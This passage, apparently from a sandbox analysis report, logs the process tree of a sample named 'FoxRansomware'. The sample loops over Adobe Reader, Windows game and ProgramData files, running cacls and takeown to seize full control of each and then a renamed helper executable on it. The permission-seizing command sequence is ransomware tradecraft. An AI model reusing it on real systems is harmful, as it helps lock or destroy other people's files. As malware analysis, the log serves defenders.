- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "icudt26l.dat" -nobanner
    3⤵
    PID:3208
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "icudt26l.dat" -nobanner
      4⤵
      PID:3280
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""
  2⤵
  PID:3448
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:3520
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ROMANIAN.TXT" -nobanner
    3⤵
    PID:3264
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ROMANIAN.TXT" -nobanner
      4⤵
      PID:4056
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3268
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""
  2⤵
  PID:3004
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C
    3⤵
    PID:1904
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"
    3⤵
    PID:2552
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1258.TXT" -nobanner
    3⤵
    PID:4024
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CP1258.TXT" -nobanner
      4⤵
      PID:2768
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3096
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png""
  2⤵
  PID:3140
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png" /E /G Admin:F /C
    3⤵
    PID:1644
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner
    3⤵
    PID:960
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "background.png" -nobanner
      4⤵
      PID:2748
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3104
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml""
  2⤵
  PID:1508
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml" /E /G Admin:F /C
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\tasks.xml"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:5676
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "tasks.xml" -nobanner
    3⤵
    PID:4528
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "tasks.xml" -nobanner
      4⤵
      PID:1724
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:280
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat""
  2⤵
  PID:1956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat" /E /G Admin:F /C
    3⤵
    PID:4028
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr0.dat"
    3⤵
    PID:4072
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "qmgr0.dat" -nobanner
    3⤵
    PID:4060
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "qmgr0.dat" -nobanner
      4⤵
      PID:4472
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4572
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""
  2⤵
  PID:4648
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C
    3⤵
    PID:4724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"
    3⤵
    - Modifies file permissions
    PID:4732
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "license.html" -nobanner
    3⤵
    PID:4740
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "license.html" -nobanner
      4⤵
      PID:3460
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png""
  2⤵
  PID:4588
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png" /E /G Admin:F /C
    3⤵
    PID:3348
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png"
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "FreeCellMCE.png" -nobanner
    3⤵
    PID:4032
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "FreeCellMCE.png" -nobanner
      4⤵
      PID:4444
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4460
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png""
  2⤵
  PID:5740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png" /E /G Admin:F /C
    3⤵
    PID:3352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Microsoft Games\Hearts\HeartsMCE.png"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3316
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "HeartsMCE.png" -nobanner
    3⤵
    PID:5652
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "HeartsMCE.png" -nobanner
      4⤵
      PID:5572
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5556
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""
  2⤵
  PID:5616
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C
    3⤵
    PID:4560
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "add_reviewer.gif" -nobanner
    3⤵
    PID:3728
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "add_reviewer.gif" -nobanner
      4⤵
      PID:5620
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4320
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif""
  2⤵
  PID:220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif" /E /G Admin:F /C
    3⤵
    PID:3320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_received.gif"
    3⤵
    PID:5596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "forms_received.gif" -nobanner
    3⤵
    PID:1680
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "forms_received.gif" -nobanner
      4⤵
      PID:3776
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3680
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif""
  2⤵
  PID:5232
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif" /E /G Admin:F /C
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_super.gif"
    3⤵
    PID:3824
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "reviews_super.gif" -nobanner
    3⤵
    PID:5716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "reviews_super.gif" -nobanner
      4⤵
      PID:3852
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2412
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif""
  2⤵
  PID:3172
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif" /E /G Admin:F /C
    3⤵
    PID:3248
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "submission_history.gif" -nobanner
    3⤵
    PID:5704
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "submission_history.gif" -nobanner
      4⤵
      PID:4164
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H""
  2⤵
  PID:3220
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H" /E /G Admin:F /C
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4104
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "Identity-H" -nobanner
    3⤵
    PID:3832
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "Identity-H" -nobanner
      4⤵
      PID:3828
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4340
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf""
  2⤵
  PID:5812
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf" /E /G Admin:F /C
    3⤵
    PID:5836
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf"
    3⤵
    - Modifies file permissions
    PID:5876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "MinionPro-Regular.otf" -nobanner
    3⤵
    PID:5872
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "MinionPro-Regular.otf" -nobanner
      4⤵
      PID:5884
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5888
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB""
  2⤵
  PID:5956
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB" /E /G Admin:F /C
    3⤵
    PID:5828
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB"
    3⤵
    PID:5636
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "ZY______.PFB" -nobanner
    3⤵
    PID:5832
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "ZY______.PFB" -nobanner
      4⤵
      PID:4128
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4204
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""
  2⤵
  PID:4208
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C
    3⤵
    PID:4140
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"
    3⤵
    PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "brt32.clx" -nobanner
    3⤵
    PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "brt32.clx" -nobanner
      4⤵
      PID:4456
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4148
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca""
  2⤵
  PID:2436
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca" /E /G Admin:F /C
    3⤵
    PID:4272
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa.fca"
    3⤵
    - Modifies file permissions
    PID:4284
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "usa.fca" -nobanner
    3⤵
    PID:4408
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "usa.fca" -nobanner
      4⤵
      PID:4228
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4296
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT""
  2⤵
  PID:4380
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT" /E /G Admin:F /C
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CROATIAN.TXT"
    3⤵
    - Modifies file permissions
    PID:1476
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CROATIAN.TXT" -nobanner
    3⤵
    PID:2468
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CROATIAN.TXT" -nobanner
      4⤵
      PID:1116
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1772
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT""
  2⤵
  PID:4304
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT" /E /G Admin:F /C
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1251.TXT"
    3⤵
    PID:4608
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "CP1251.TXT" -nobanner
    3⤵
    PID:3980
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "CP1251.TXT" -nobanner
      4⤵
      PID:4628
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc""
  2⤵
  PID:5912
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc" /E /G Admin:F /C
    3⤵
    PID:4760
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc"
    3⤵
    - Modifies file permissions
    PID:1704
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "adobepdf.xdc" -nobanner
    3⤵
    PID:748
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "adobepdf.xdc" -nobanner
      4⤵
      PID:1596
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4804
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png""
  2⤵
  PID:4768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png" /E /G Admin:F /C
    3⤵
    PID:4656
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png"
    3⤵
    PID:4864
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "background.png" -nobanner
    3⤵
    PID:4884
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "background.png" -nobanner
      4⤵
      PID:4876
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4920
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml""
  2⤵
  PID:4848
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml" /E /G Admin:F /C
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\resource.xml"
    3⤵
    - Modifies file permissions
    PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4996
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:5036
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml""
  2⤵
  PID:5324
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4240
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\it-IT\resource.xml"
    3⤵
    PID:5980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:6016
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:6040
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:6056
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif""
  2⤵
  PID:6084
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif" /E /G Admin:F /C
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif"
    3⤵
    PID:6108
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "distribute_form.gif" -nobanner
    3⤵
    PID:1076
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
      D22bUU4y.exe -accepteula "distribute_form.gif" -nobanner
      4⤵
      PID:3704
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
    D22bUU4y.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3696
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\yc1StfN0.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""
  2⤵
  PID:3712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C
    3⤵
    PID:6104
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"
    3⤵
    PID:6100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c D22bUU4y.exe -accepteula "main.css" -nobanner
    3⤵
    PID:2488
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\D22bUU4y.exe
